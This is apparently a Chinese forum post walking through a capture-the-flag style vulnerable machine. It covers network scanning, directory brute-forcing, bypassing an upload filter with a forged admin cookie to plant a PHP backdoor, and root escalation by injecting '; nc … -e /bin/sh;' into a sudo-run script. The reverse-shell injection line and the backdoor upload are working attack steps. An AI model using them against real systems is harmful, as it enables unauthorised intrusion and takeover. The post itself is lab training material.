探测IP+端口扫描
netdiscover -r 192.168.81.0/24
nmap -A -p- 192.168.81.159
一个在22端口运行的SSH服务器
一个运行在80端口的HTTP服务(Apache服务器)
查看网站页面
默认页面没有任何有用的信息
探测子目录
gobuster dir -u http://192.168.81.159 -w /usr/share/wordlists/dirbuster/director
y-list-2.3-medium.txt -t 40 -x html,txt,php,bak
查看可能存在可利用的网页
dashboard可以进行文件上传
尝试长传文件,发现php会被过滤掉,但可以上传txt
查看源码,发现全端没有限制,应该在后端进行了过滤
继续查看,访问/owls,发现上传的文件存储在了这里,因为会过滤,所以暂时不能利用上传功能了
但是,似乎 ajax.php文件存在备份文件
curl http://192.168.81.159/ajax.php.bak
看起来管理员可以上传pdf、txt和PHP文件。因此,如果我们设置管理员的cookie,我们可以将shell上载到目标
我们可能必须在请求中发送一个值为 val1d 的新POST参数 secure。
//老板让我在cookie的末尾再加一个大写字母-----》缺少一个字符
编写一个后门文件,再一次上传,并用burp抓包
// Remember success upload returns 1 得到最后一个字母为R并上传成功了
进行端口侦听,开启侦听后访问上传的文件得到如下界面
遍历文件,发现在/home/athena$目录下有密码信息myvulnerableapp* Asterisk翻译是星号
user.txt中有一个flag
此时/root不能进入,我们尝试登录athena,看看有没有可以提升root权限的漏洞
提权root
ssh登录
ssh athena@192.168.81.159
sudo -l
可以看到用户可以以root身份执行python脚本,还有一个脚本
查以下该命令的意思
得知是执行了bash shell把命令写入log.txt, 因此,如果我可以输入一些命令,这将使我获得root访问权限。
所以在输入seed,直接输入一个反弹的shell,kali端进行监听
; nc 192.168.81.137 9004 -e /bin/sh; 第一个分号结束echo,然后写入反弹命令
获得root权限,查看第二个flag成功
|
楼主